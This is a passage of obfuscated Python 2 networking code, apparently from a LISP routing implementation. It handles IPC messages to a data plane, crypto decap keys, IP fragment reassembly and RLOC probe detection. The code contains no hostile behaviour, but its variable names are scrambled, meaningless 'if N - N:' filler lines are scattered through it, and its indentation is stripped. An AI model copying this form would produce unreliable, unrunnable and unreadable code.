else :
I1iII11ii1 = { "type" : "decap-keys" , "rloc" : oo0000O [ 0 ] , "port" : oo0000O [ 1 ] }
if 57 - 57: I1IiiI . II111iiii . i1IIi * O0
I1iII11ii1 = lisp_build_json_keys ( I1iII11ii1 , IiiI , Oo0oO , "decrypt-key" )
if 90 - 90: i11iIiiIii + iIii1I11I1II1 + O0 % I1IiiI
lisp_write_to_dp_socket ( I1iII11ii1 )
return
if 95 - 95: ooOoO0o % OOooOOo
if 17 - 17: i1IIi + Ii1I
if 35 - 35: iIii1I11I1II1 - Oo0Ooo - OoooooooOO % I1ii11iIi11i
if 27 - 27: Oo0Ooo * II111iiii - OOooOOo + o0oOOo0O0Ooo
if 26 - 26: oO0o / I1ii11iIi11i - oO0o
if 9 - 9: ooOoO0o * iIii1I11I1II1 * OoooooooOO
if 13 - 13: iII111i . i11iIiiIii * o0oOOo0O0Ooo . iII111i
if 96 - 96: Ii1I
def lisp_build_json_keys ( entry , ekey , ikey , key_type ) :
if ( ekey == None ) : return ( entry )
if 90 - 90: II111iiii
entry [ "keys" ] = [ ]
ii1i1I1111ii = { "key-id" : "1" , key_type : ekey , "icv-key" : ikey }
entry [ "keys" ] . append ( ii1i1I1111ii )
return ( entry )
if 93 - 93: i11iIiiIii / Ii1I * Oo0Ooo . iII111i % iII111i / IiII
if 15 - 15: OoOoOO00 % I1Ii111 - iIii1I11I1II1
if 52 - 52: i11iIiiIii * ooOoO0o
if 15 - 15: OoooooooOO . oO0o . i11iIiiIii / o0oOOo0O0Ooo
if 91 - 91: ooOoO0o
if 47 - 47: II111iiii + I11i + ooOoO0o % Oo0Ooo / iII111i
if 9 - 9: O0 + IiII
def lisp_write_ipc_database_mappings ( ephem_port ) :
if ( lisp_i_am_etr == False ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 69 - 69: I1IiiI
if 11 - 11: I11i % I1Ii111 + O0 . Ii1I . I1ii11iIi11i % I1Ii111
if 28 - 28: IiII . o0oOOo0O0Ooo + iII111i - OoOoOO00 / OOooOOo
if 86 - 86: ooOoO0o * OoOoOO00 + oO0o / II111iiii % OOooOOo
I1iII11ii1 = { "type" : "database-mappings" , "database-mappings" : [ ] }
if 89 - 89: O0 * Ii1I / OoO0O00 / OoOoOO00 % iII111i * iIii1I11I1II1
if 72 - 72: iIii1I11I1II1 / iIii1I11I1II1 * I11i
if 19 - 19: I1ii11iIi11i
if 42 - 42: OoOoOO00 / IiII
for Ooooo00 in lisp_db_list :
if ( Ooooo00 . eid . is_ipv4 ( ) == False and Ooooo00 . eid . is_ipv6 ( ) == False ) : continue
o000O0O0 = { "instance-id" : str ( Ooooo00 . eid . instance_id ) ,
"eid-prefix" : Ooooo00 . eid . print_prefix_no_iid ( ) }
I1iII11ii1 [ "database-mappings" ] . append ( o000O0O0 )
if 74 - 74: ooOoO0o
lisp_write_to_dp_socket ( I1iII11ii1 )
if 93 - 93: Oo0Ooo % ooOoO0o
if 38 - 38: II111iiii . I1Ii111 . iIii1I11I1II1 / o0oOOo0O0Ooo
if 6 - 6: ooOoO0o - i1IIi * I1IiiI
if 24 - 24: iIii1I11I1II1 / I1Ii111
if 16 - 16: OoOoOO00 * I1Ii111 - I1IiiI / I1Ii111
I1iII11ii1 = { "type" : "etr-nat-port" , "port" : ephem_port }
lisp_write_to_dp_socket ( I1iII11ii1 )
return
if 64 - 64: I1ii11iIi11i . i1IIi % II111iiii % Oo0Ooo + oO0o - I1IiiI
if 24 - 24: IiII . II111iiii . II111iiii . OoOoOO00 . i11iIiiIii
if 11 - 11: Ii1I
if 82 - 82: I11i - i1IIi . Oo0Ooo * I1Ii111
if 44 - 44: iII111i
if 56 - 56: II111iiii / Oo0Ooo % IiII * II111iiii - iIii1I11I1II1 + ooOoO0o
if 33 - 33: o0oOOo0O0Ooo . I11i / I1IiiI
def lisp_write_ipc_interfaces ( ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 29 - 29: o0oOOo0O0Ooo - ooOoO0o
if 59 - 59: I11i / IiII * OoO0O00 / IiII . I1Ii111
if 82 - 82: OOooOOo . iIii1I11I1II1 + I1Ii111
if 14 - 14: IiII . i11iIiiIii
I1iII11ii1 = { "type" : "interfaces" , "interfaces" : [ ] }
if 17 - 17: ooOoO0o % ooOoO0o * oO0o
for II1i in lisp_myinterfaces . values ( ) :
if ( II1i . instance_id == None ) : continue
o000O0O0 = { "interface" : II1i . device ,
"instance-id" : str ( II1i . instance_id ) }
I1iII11ii1 [ "interfaces" ] . append ( o000O0O0 )
if 8 - 8: ooOoO0o + OoO0O00 . II111iiii / iIii1I11I1II1 - OOooOOo
if 87 - 87: iIii1I11I1II1 . IiII % I1IiiI . OoO0O00 - I1Ii111
lisp_write_to_dp_socket ( I1iII11ii1 )
return
if 53 - 53: I1Ii111 % i11iIiiIii
if 99 - 99: I1IiiI - i1IIi * i11iIiiIii + OoO0O00
if 80 - 80: o0oOOo0O0Ooo . I11i % iIii1I11I1II1 + OoOoOO00
if 87 - 87: I1Ii111 + II111iiii / I1ii11iIi11i + OoOoOO00
if 71 - 71: I1IiiI + iIii1I11I1II1 + O0 * iII111i % IiII
if 42 - 42: OOooOOo - I1ii11iIi11i
if 93 - 93: I1Ii111 + OOooOOo % ooOoO0o / I1Ii111 % OOooOOo . IiII
if 37 - 37: iII111i * oO0o / oO0o / Ii1I % I11i
if 12 - 12: i11iIiiIii
if 62 - 62: oO0o + OOooOOo + oO0o + I1IiiI
if 10 - 10: IiII - Oo0Ooo % ooOoO0o
if 38 - 38: oO0o * o0oOOo0O0Ooo . I11i % II111iiii / I11i % Ii1I
if 19 - 19: II111iiii / i11iIiiIii * II111iiii + OoOoOO00 - OoOoOO00
if 7 - 7: OoOoOO00 - OoO0O00 % OoOoOO00 . I1ii11iIi11i % Oo0Ooo * iII111i
def lisp_parse_auth_key ( value ) :
oo0O = value . split ( "[" )
o0O0o0Oo = { }
if ( len ( oo0O ) == 1 ) :
o0O0o0Oo [ 0 ] = value
return ( o0O0o0Oo )
if 98 - 98: o0oOOo0O0Ooo
if 56 - 56: Ii1I % Ii1I + i11iIiiIii * iII111i / i11iIiiIii
for O0Oo0 in oo0O :
if ( O0Oo0 == "" ) : continue
ooo = O0Oo0 . find ( "]" )
IIIiI1i = O0Oo0 [ 0 : ooo ]
try : IIIiI1i = int ( IIIiI1i )
except : return
if 53 - 53: ooOoO0o
o0O0o0Oo [ IIIiI1i ] = O0Oo0 [ ooo + 1 : : ]
if 58 - 58: OoOoOO00 - i11iIiiIii / OOooOOo . Oo0Ooo
return ( o0O0o0Oo )
if 54 - 54: IiII * i11iIiiIii . ooOoO0o . Ii1I
if 60 - 60: Oo0Ooo % I11i - OoOoOO00 % II111iiii
if 82 - 82: OoooooooOO % IiII / i11iIiiIii
if 100 - 100: Ii1I / I1ii11iIi11i + OOooOOo + I1Ii111 / IiII
if 13 - 13: IiII + iII111i . I1Ii111 - iII111i - o0oOOo0O0Ooo
if 72 - 72: II111iiii . I11i % I1Ii111 % I1ii11iIi11i
if 9 - 9: OoOoOO00 * II111iiii
if 21 - 21: OoooooooOO
if 34 - 34: i11iIiiIii / I1Ii111 - o0oOOo0O0Ooo / i1IIi * I11i
if 87 - 87: IiII / I1IiiI . OoOoOO00
if 80 - 80: i1IIi + OOooOOo % i11iIiiIii * I1ii11iIi11i
if 49 - 49: iIii1I11I1II1
if 2 - 2: OOooOOo * o0oOOo0O0Ooo - OOooOOo . I11i
if 32 - 32: OoO0O00
if 34 - 34: O0 * iIii1I11I1II1 . o0oOOo0O0Ooo . I1Ii111 . iIii1I11I1II1 * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1
def lisp_reassemble ( packet ) :
O00000OO00OO = socket . ntohs ( struct . unpack ( "H" , packet [ 6 : 8 ] ) [ 0 ] )
if 83 - 83: iII111i - Ii1I . oO0o - I1Ii111 * o0oOOo0O0Ooo
if 70 - 70: i11iIiiIii - OoO0O00 / i11iIiiIii
if 46 - 46: II111iiii + O0 * OoooooooOO
if 39 - 39: OoooooooOO % II111iiii . o0oOOo0O0Ooo
if ( O00000OO00OO == 0 or O00000OO00OO == 0x4000 ) : return ( packet )
if 29 - 29: I11i . o0oOOo0O0Ooo . i1IIi . o0oOOo0O0Ooo
if 77 - 77: iIii1I11I1II1 + iIii1I11I1II1
if 52 - 52: I1ii11iIi11i - IiII % I1IiiI % i1IIi
if 98 - 98: I1Ii111 + II111iiii % OoO0O00 % iII111i
oOoO0O00o = socket . ntohs ( struct . unpack ( "H" , packet [ 4 : 6 ] ) [ 0 ] )
OoI1i11IIii = socket . ntohs ( struct . unpack ( "H" , packet [ 2 : 4 ] ) [ 0 ] )
if 88 - 88: II111iiii - ooOoO0o
OO00oOOO0o0oo = ( O00000OO00OO & 0x2000 == 0 and ( O00000OO00OO & 0x1fff ) != 0 )
I1iII11ii1 = [ ( O00000OO00OO & 0x1fff ) * 8 , OoI1i11IIii - 20 , packet , OO00oOOO0o0oo ]
if 13 - 13: I1IiiI - Ii1I - iII111i - iIii1I11I1II1 . II111iiii
if 40 - 40: I1ii11iIi11i * o0oOOo0O0Ooo + oO0o - OoOoOO00
if 80 - 80: I1ii11iIi11i . OoooooooOO / ooOoO0o
if 19 - 19: oO0o
if 97 - 97: IiII
if 36 - 36: II111iiii
if 83 - 83: I11i . ooOoO0o
if 57 - 57: IiII
if ( O00000OO00OO == 0x2000 ) :
i1i1IIiII1I , OOO = struct . unpack ( "HH" , packet [ 20 : 24 ] )
i1i1IIiII1I = socket . ntohs ( i1i1IIiII1I )
OOO = socket . ntohs ( OOO )
if ( OOO not in [ 4341 , 8472 , 4789 ] and i1i1IIiII1I != 4341 ) :
lisp_reassembly_queue [ oOoO0O00o ] = [ ]
I1iII11ii1 [ 2 ] = None
if 34 - 34: I1ii11iIi11i + i11iIiiIii - I1ii11iIi11i / OoOoOO00 + i1IIi . i11iIiiIii
if 48 - 48: I1ii11iIi11i % OoOoOO00 * OoOoOO00 % o0oOOo0O0Ooo * II111iiii / OoOoOO00
if 73 - 73: OoOoOO00 + OOooOOo * II111iiii . OOooOOo % I1Ii111 % oO0o
if 79 - 79: I1ii11iIi11i % I11i
if 78 - 78: i11iIiiIii % I1Ii111 + iIii1I11I1II1 + iII111i
if 66 - 66: I1IiiI - o0oOOo0O0Ooo
if ( lisp_reassembly_queue . has_key ( oOoO0O00o ) == False ) :
lisp_reassembly_queue [ oOoO0O00o ] = [ ]
if 67 - 67: oO0o . iII111i * Ii1I - OOooOOo / oO0o
if 98 - 98: OoOoOO00 * OoO0O00 . Oo0Ooo
if 6 - 6: I11i % iIii1I11I1II1 + I1Ii111
if 48 - 48: II111iiii . OOooOOo . ooOoO0o - iII111i
if 90 - 90: OOooOOo
i11iii = lisp_reassembly_queue [ oOoO0O00o ]
if 89 - 89: Oo0Ooo / iIii1I11I1II1 . OoOoOO00
if 6 - 6: Ii1I / iII111i
if 69 - 69: iIii1I11I1II1 % I1Ii111 % OOooOOo + O0 - OoOoOO00 % oO0o
if 70 - 70: oO0o - I1IiiI + Ii1I
if 54 - 54: OoOoOO00 / ooOoO0o - I1IiiI
if ( len ( i11iii ) == 1 and i11iii [ 0 ] [ 2 ] == None ) :
dprint ( "Drop non-LISP encapsulated fragment 0x{}" . format ( lisp_hex_string ( oOoO0O00o ) . zfill ( 4 ) ) )
if 37 - 37: o0oOOo0O0Ooo
return ( None )
if 57 - 57: iII111i / i1IIi / i1IIi + IiII
if 75 - 75: IiII / O0
if 72 - 72: I11i
if 35 - 35: I11i % OoooooooOO / i1IIi * i1IIi / I1IiiI
if 42 - 42: I11i - i1IIi - oO0o / I11i + Ii1I + ooOoO0o
i11iii . append ( I1iII11ii1 )
i11iii = sorted ( i11iii )
if 23 - 23: OoOoOO00 . oO0o - iII111i
if 27 - 27: Oo0Ooo * OOooOOo - OoOoOO00
if 1 - 1: II111iiii * i11iIiiIii . OoooooooOO
if 37 - 37: OoooooooOO + O0 . I11i % OoOoOO00
IiiIIi1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
IiiIIi1 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
O0OooooOo0o0o0oO = IiiIIi1 . print_address_no_iid ( )
IiiIIi1 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 16 : 20 ] ) [ 0 ] )
IIiI = IiiIIi1 . print_address_no_iid ( )
IiiIIi1 = red ( "{} -> {}" . format ( O0OooooOo0o0o0oO , IIiI ) , False )
if 93 - 93: OoOoOO00 + iII111i
dprint ( "{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}" . format ( bold ( "Received" , False ) , " non-LISP encapsulated" if I1iII11ii1 [ 2 ] == None else "" , IiiIIi1 , lisp_hex_string ( oOoO0O00o ) . zfill ( 4 ) ,
# i11iIiiIii / i11iIiiIii % OoooooooOO
# OOooOOo * O0 % ooOoO0o - ooOoO0o
lisp_hex_string ( O00000OO00OO ) . zfill ( 4 ) ) )
if 46 - 46: o0oOOo0O0Ooo * oO0o / oO0o . oO0o + I11i * OOooOOo
if 48 - 48: iII111i + Ii1I
if 10 - 10: I1IiiI + o0oOOo0O0Ooo
if 75 - 75: Oo0Ooo
if 100 - 100: i1IIi / Oo0Ooo / II111iiii + iII111i . II111iiii * oO0o
if ( i11iii [ 0 ] [ 0 ] != 0 or i11iii [ - 1 ] [ 3 ] == False ) : return ( None )
IIi1I11oO = i11iii [ 0 ]
for oO in i11iii [ 1 : : ] :
O00000OO00OO = oO [ 0 ]
o00o , IiIoo0OO0Oo0ooo0 = IIi1I11oO [ 0 ] , IIi1I11oO [ 1 ]
if ( o00o + IiIoo0OO0Oo0ooo0 != O00000OO00OO ) : return ( None )
IIi1I11oO = oO
if 87 - 87: I1IiiI + Ii1I * I11i
lisp_reassembly_queue . pop ( oOoO0O00o )
if 77 - 77: IiII / I1Ii111 * OoOoOO00 . O0 % I11i
if 62 - 62: iIii1I11I1II1 . o0oOOo0O0Ooo . ooOoO0o % oO0o % O0 % oO0o
if 51 - 51: Oo0Ooo / IiII - Oo0Ooo
if 71 - 71: I11i * I1ii11iIi11i * OOooOOo * o0oOOo0O0Ooo
if 53 - 53: I1IiiI % I1IiiI
packet = i11iii [ 0 ] [ 2 ]
for oO in i11iii [ 1 : : ] : packet += oO [ 2 ] [ 20 : : ]
if 80 - 80: OoO0O00 - i11iIiiIii / iII111i * I1ii11iIi11i / I1IiiI - I1Ii111
dprint ( "{} fragments arrived for packet 0x{}, length {}" . format ( bold ( "All" , False ) , lisp_hex_string ( oOoO0O00o ) . zfill ( 4 ) , len ( packet ) ) )
if 85 - 85: IiII
if 72 - 72: iII111i * OoOoOO00
if 65 - 65: iIii1I11I1II1 / iIii1I11I1II1 % O0 / II111iiii . OOooOOo . O0
if 65 - 65: I11i
if 35 - 35: o0oOOo0O0Ooo - i11iIiiIii
iiiIIiiIi = socket . htons ( len ( packet ) )
Ii1I1i1IiiI = packet [ 0 : 2 ] + struct . pack ( "H" , iiiIIiiIi ) + packet [ 4 : 6 ] + struct . pack ( "H" , 0 ) + packet [ 8 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : 20 ]
if 78 - 78: ooOoO0o - II111iiii - i1IIi
if 18 - 18: OoooooooOO % OoOoOO00 - IiII / oO0o . OOooOOo . I1IiiI
Ii1I1i1IiiI = lisp_ip_checksum ( Ii1I1i1IiiI )
return ( Ii1I1i1IiiI + packet [ 20 : : ] )
if 77 - 77: I1ii11iIi11i . OoO0O00 / OoOoOO00 / O0
if 67 - 67: ooOoO0o % I11i % oO0o
if 74 - 74: II111iiii
if 44 - 44: Oo0Ooo + OoO0O00 + OoOoOO00 - I1IiiI
if 68 - 68: i11iIiiIii / OOooOOo . i1IIi . i11iIiiIii . I11i
if 56 - 56: iIii1I11I1II1 - II111iiii * i1IIi / Ii1I
if 65 - 65: OOooOOo / I1IiiI . OoooooooOO + I1IiiI + OoooooooOO + i11iIiiIii
if 20 - 20: I1IiiI + iII111i + O0 * O0
def lisp_get_crypto_decap_lookup_key ( addr , port ) :
oo0o00OO = addr . print_address_no_iid ( ) + ":" + str ( port )
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) : return ( oo0o00OO )
if 18 - 18: I11i - I11i . OoOoOO00 . ooOoO0o
oo0o00OO = addr . print_address_no_iid ( )
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) : return ( oo0o00OO )
if 31 - 31: ooOoO0o
if 87 - 87: OoooooooOO + OOooOOo - I1ii11iIi11i / I1IiiI + ooOoO0o - Oo0Ooo
if 19 - 19: ooOoO0o + I1ii11iIi11i - ooOoO0o
if 17 - 17: I11i * i1IIi + iIii1I11I1II1 % I1IiiI
if 44 - 44: IiII + I1IiiI . Ii1I % Oo0Ooo
for o0Oo00Ooo in lisp_crypto_keys_by_rloc_decap :
OO0o = o0Oo00Ooo . split ( ":" )
if ( len ( OO0o ) == 1 ) : continue
OO0o = OO0o [ 0 ] if len ( OO0o ) == 2 else ":" . join ( OO0o [ 0 : - 1 ] )
if ( OO0o == oo0o00OO ) :
oOoo0oO = lisp_crypto_keys_by_rloc_decap [ o0Oo00Ooo ]
lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] = oOoo0oO
return ( oo0o00OO )
if 10 - 10: oO0o
if 53 - 53: i1IIi - iIii1I11I1II1 * o0oOOo0O0Ooo / OoooooooOO
return ( None )
if 30 - 30: OOooOOo . iIii1I11I1II1 * ooOoO0o * OoooooooOO / I1IiiI
if 67 - 67: OoOoOO00 % iII111i . o0oOOo0O0Ooo / II111iiii * O0 / I1IiiI
if 20 - 20: oO0o * O0 - Ii1I + i11iIiiIii - OoOoOO00
if 18 - 18: I1ii11iIi11i . iII111i
if 31 - 31: I11i * o0oOOo0O0Ooo
if 17 - 17: Ii1I * iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo - IiII
if 78 - 78: i11iIiiIii . o0oOOo0O0Ooo
if 72 - 72: Oo0Ooo % II111iiii + O0 * OoOoOO00 - OOooOOo + I1Ii111
if 23 - 23: I1IiiI - O0 - iII111i . II111iiii / oO0o
if 1 - 1: I11i . OOooOOo / oO0o % I11i * Oo0Ooo + Oo0Ooo
def lisp_build_crypto_decap_lookup_key ( addr , port ) :
addr = addr . print_address_no_iid ( )
i1Ii11IIIi = addr + ":" + str ( port )
if 98 - 98: i1IIi
if ( lisp_i_am_rtr ) :
if ( lisp_rloc_probe_list . has_key ( addr ) ) : return ( addr )
if 19 - 19: OoO0O00 % I1ii11iIi11i + I1ii11iIi11i
if 3 - 3: i11iIiiIii - iIii1I11I1II1 / OoOoOO00
if 34 - 34: I1IiiI . IiII / ooOoO0o + I1Ii111 / iIii1I11I1II1 + OoooooooOO
if 80 - 80: OoO0O00 - OoOoOO00 % i1IIi / iIii1I11I1II1 . I11i - I11i
if 76 - 76: ooOoO0o * iII111i / Ii1I * i1IIi . I1Ii111 - o0oOOo0O0Ooo
if 52 - 52: OoOoOO00 % O0 + I1ii11iIi11i . i11iIiiIii
for O00OOoOOO0O0O in lisp_nat_state_info . values ( ) :
for o0i1i in O00OOoOOO0O0O :
if ( addr == o0i1i . address ) : return ( i1Ii11IIIi )
if 59 - 59: Ii1I - I1Ii111 . ooOoO0o - OoOoOO00 + oO0o . OoO0O00
if 88 - 88: OOooOOo - ooOoO0o * o0oOOo0O0Ooo . OoooooooOO
return ( addr )
if 3 - 3: I1Ii111
return ( i1Ii11IIIi )
if 24 - 24: Ii1I + i11iIiiIii * I1Ii111 - OoOoOO00 / Ii1I - OoOoOO00
if 69 - 69: I11i - I1IiiI . oO0o - OoooooooOO
if 33 - 33: o0oOOo0O0Ooo - o0oOOo0O0Ooo
if 55 - 55: OoooooooOO / IiII + i1IIi
if 54 - 54: ooOoO0o * Ii1I / Ii1I
if 15 - 15: oO0o * I1Ii111
if 11 - 11: Ii1I + o0oOOo0O0Ooo * OoooooooOO % iIii1I11I1II1
def lisp_set_ttl ( lisp_socket , ttl ) :
try :
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_TTL , ttl )
except :
lprint ( "socket.setsockopt(IP_TTL) not supported" )
pass
if 87 - 87: OoO0O00 + o0oOOo0O0Ooo
return
if 46 - 46: oO0o + OoOoOO00
if 17 - 17: Ii1I . Oo0Ooo - oO0o % OOooOOo
if 59 - 59: O0
if 75 - 75: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i * oO0o * I11i / OoooooooOO
if 17 - 17: Ii1I % I1ii11iIi11i + I11i
if 80 - 80: i1IIi . OoooooooOO % OoooooooOO . oO0o / OOooOOo
if 85 - 85: OOooOOo
def lisp_is_rloc_probe_request ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x12 )
if 80 - 80: ooOoO0o % O0 % I1ii11iIi11i + Oo0Ooo
if 82 - 82: oO0o / iIii1I11I1II1 % ooOoO0o . Ii1I / i1IIi - I1Ii111
if 15 - 15: I11i - OOooOOo . II111iiii . iIii1I11I1II1
if 93 - 93: I11i + o0oOOo0O0Ooo / OOooOOo + Ii1I % Oo0Ooo % I1ii11iIi11i
if 72 - 72: IiII / II111iiii
if 25 - 25: i1IIi + OoOoOO00 + oO0o + OoooooooOO
if 21 - 21: I1ii11iIi11i
def lisp_is_rloc_probe_reply ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x28 )
if 60 - 60: i1IIi / OoO0O00 . Ii1I
if 16 - 16: i11iIiiIii + OoOoOO00 % Oo0Ooo + I1ii11iIi11i * Ii1I / I1Ii111
if 26 - 26: iII111i
if 31 - 31: iII111i
if 45 - 45: OoO0O00
if 55 - 55: iIii1I11I1II1 % iIii1I11I1II1 + I11i - ooOoO0o + I1IiiI * O0
if 47 - 47: ooOoO0o + iIii1I11I1II1 * OOooOOo . I1IiiI . o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo . OoOoOO00 * OOooOOo
if 86 - 86: IiII * OOooOOo + Ii1I
if 62 - 62: I11i
if 86 - 86: Oo0Ooo % II111iiii + I1Ii111 / I1ii11iIi11i
if 15 - 15: I1IiiI / I1Ii111 % iII111i
if 57 - 57: I1Ii111 . iIii1I11I1II1 / Oo0Ooo / IiII / iII111i * OoOoOO00
if 35 - 35: i1IIi + I1Ii111 - ooOoO0o . I1ii11iIi11i + Oo0Ooo
if 43 - 43: oO0o . OoO0O00 * i1IIi
if 1 - 1: ooOoO0o / i1IIi
if 42 - 42: I1ii11iIi11i * ooOoO0o + OoOoOO00 % I1ii11iIi11i . IiII
if 75 - 75: OoO0O00 * i1IIi - OOooOOo % II111iiii % OoO0O00 - OoOoOO00
if 75 - 75: I11i * IiII * ooOoO0o
def lisp_is_rloc_probe ( packet , rr ) :
o0oOo00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == 17 )
if ( o0oOo00 == False ) : return ( [ packet , None , None , None ] )
if 31 - 31: Ii1I
i1i1IIiII1I = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
OOO = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
o000O00OOOOOo = ( socket . htons ( LISP_CTRL_PORT ) in [ i1i1IIiII1I , OOO ] )
if ( o000O00OOOOOo == False ) : return ( [ packet , None , None , None ] )
if 84 - 84: OoO0O00 + OoooooooOO + oO0o
if ( rr == 0 ) :
OOO0oOooOOo00 = lisp_is_rloc_probe_request ( packet [ 28 ] )
if ( OOO0oOooOOo00 == False ) : return ( [ packet , None , None , None ] )
elif ( rr == 1 ) :
OOO0oOooOOo00 = lisp_is_rloc_probe_reply ( packet [ 28 ] )
if ( OOO0oOooOOo00 == False ) : return ( [ packet , None , None , None ] )
elif ( rr == - 1 ) :
OOO0oOooOOo00 = lisp_is_rloc_probe_request ( packet [ 28 ] )
if ( OOO0oOooOOo00 == False ) :
OOO0oOooOOo00 = lisp_is_rloc_probe_reply ( packet [ 28 ] )
if ( OOO0oOooOOo00 == False ) : return ( [ packet , None , None , None ] )
if 3 - 3: iIii1I11I1II1 * i1IIi
if 5 - 5: ooOoO0o
if 80 - 80: O0 / iIii1I11I1II1 % iII111i * ooOoO0o / i11iIiiIii . OoOoOO00
if 88 - 88: OoooooooOO . I1IiiI
if 6 - 6: I1Ii111 - i11iIiiIii - oO0o
if 7 - 7: i1IIi
oo00Oo0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
oo00Oo0 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
if 6 - 6: OoooooooOO - Oo0Ooo - I1ii11iIi11i
if 34 - 34: iII111i + i11iIiiIii . IiII
if 54 - 54: Oo0Ooo + I11i - iII111i * ooOoO0o % i11iIiiIii . IiII
if 29 - 29: II111iiii % i11iIiiIii % O0
if ( oo00Oo0 . is_local ( ) ) : return ( [ None , None , None , None ] )
if 38 - 38: o0oOOo0O0Ooo * IiII
if 51 - 51: OoooooooOO . Ii1I % OoooooooOO - I1IiiI + I1Ii111 % oO0o
if 28 - 28: i11iIiiIii - I1IiiI * OoO0O00
if 19 - 19: OoooooooOO
oo00Oo0 = oo00Oo0 . print_address_no_iid ( )
IiI1iI1 = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
oo0o = struct . unpack ( "B" , packet [ 8 ] ) [ 0 ] - 1
packet = packet [ 28 : : ]
if 34 - 34: OoOoOO00 . oO0o
i11iII1IiI = bold ( "Receive(pcap)" , False )
ii11I1IIi = bold ( "from " + oo00Oo0 , False )
III1I1Iii1 = lisp_format_packet ( packet )
lprint ( "{} {} bytes {} {}, packet: {}" . format ( i11iII1IiI , len ( packet ) , ii11I1IIi , IiI1iI1 , III1I1Iii1 ) )
if 53 - 53: oO0o + OoooooooOO * ooOoO0o
return ( [ packet , oo00Oo0 , IiI1iI1 , oo0o ] )
if 85 - 85: I1ii11iIi11i - o0oOOo0O0Ooo % o0oOOo0O0Ooo % iII111i * OoOoOO00
if 50 - 50: I1Ii111 + I1Ii111 + I11i - OoOoOO00
if 65 - 65: oO0o / I11i + iII111i - I1ii11iIi11i
if 80 - 80: II111iiii . i11iIiiIii
if 66 - 66: ooOoO0o * iII111i * OOooOOo % OoO0O00 / I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 52 - 52: iIii1I11I1II1 + O0
if 84 - 84: OOooOOo / iII111i . I1IiiI / O0 % OOooOOo . iII111i
if 32 - 32: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo / O0
if 29 - 29: iII111i % I1Ii111
if 95 - 95: OOooOOo - ooOoO0o % i1IIi / O0 % I11i . IiII
def lisp_ipc_write_xtr_parameters ( cp , dp ) :
if ( lisp_ipc_dp_socket == None ) : return
if 63 - 63: ooOoO0o
OoOO0o00OOO0o = { "type" : "xtr-parameters" , "control-plane-logging" : cp ,
"data-plane-logging" : dp , "rtr" : lisp_i_am_rtr }
if 22 - 22: OOooOOo . i11iIiiIii + II111iiii - Oo0Ooo % i1IIi / o0oOOo0O0Ooo
lisp_write_to_dp_socket ( OoOO0o00OOO0o )
return
if 90 - 90: IiII
if 38 - 38: i1IIi / ooOoO0o / I11i * I1ii11iIi11i / II111iiii . iIii1I11I1II1
if 52 - 52: I1ii11iIi11i % ooOoO0o * Ii1I * IiII + IiII / i11iIiiIii
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo % o0oOOo0O0Ooo . Ii1I / OoooooooOO
if 23 - 23: oO0o * I1IiiI - oO0o - ooOoO0o . IiII / i11iIiiIii
if 53 - 53: Ii1I * Ii1I . OoOoOO00 . OOooOOo / I1ii11iIi11i % O0
if 98 - 98: OOooOOo
if 11 - 11: OOooOOo * iIii1I11I1II1 % IiII - I1IiiI . I11i
def lisp_external_data_plane ( ) :
ooO0ooooO = 'egrep "ipc-data-plane = yes" ./lisp.config'
if ( commands . getoutput ( ooO0ooooO ) != "" ) : return ( True )
if 29 - 29: OOooOOo % I11i - OOooOOo - OOooOOo * I11i . oO0o
if ( os . getenv ( "LISP_RUN_LISP_XTR" ) != None ) : return ( True )
return ( False )
if 75 - 75: II111iiii . O0 . I1Ii111 * O0 / OoooooooOO
if 60 - 60: OOooOOo - Oo0Ooo * OOooOOo / OoO0O00
if 55 - 55: I1ii11iIi11i * II111iiii * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1 % I1ii11iIi11i . Ii1I + I1IiiI % i11iIiiIii - i11iIiiIii
if 62 - 62: I1Ii111 + I1IiiI
if 9 - 9: iIii1I11I1II1 / iIii1I11I1II1
if 24 - 24: OOooOOo . I1IiiI % i11iIiiIii
if 43 - 43: OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i + OoO0O00 . I1Ii111 . iII111i
if 1 - 1: iII111i / OoO0O00 / OoOoOO00 * Oo0Ooo * OoooooooOO
if 59 - 59: iII111i
if 14 - 14: oO0o . IiII + iIii1I11I1II1 - i1IIi
if 46 - 46: i11iIiiIii * II111iiii / i11iIiiIii % i11iIiiIii * II111iiii + i11iIiiIii
if 87 - 87: Oo0Ooo + OoO0O00 / II111iiii * OoooooooOO
if 95 - 95: I1Ii111 * o0oOOo0O0Ooo + OoO0O00 % OoOoOO00 - ooOoO0o / OoOoOO00
def lisp_process_data_plane_restart ( do_clear = False ) :
os . system ( "touch ./lisp.config" )
if 45 - 45: OoooooooOO / oO0o / o0oOOo0O0Ooo + Ii1I + O0 . iII111i
iiIOooo0000O0O00 = { "type" : "entire-map-cache" , "entries" : [ ] }
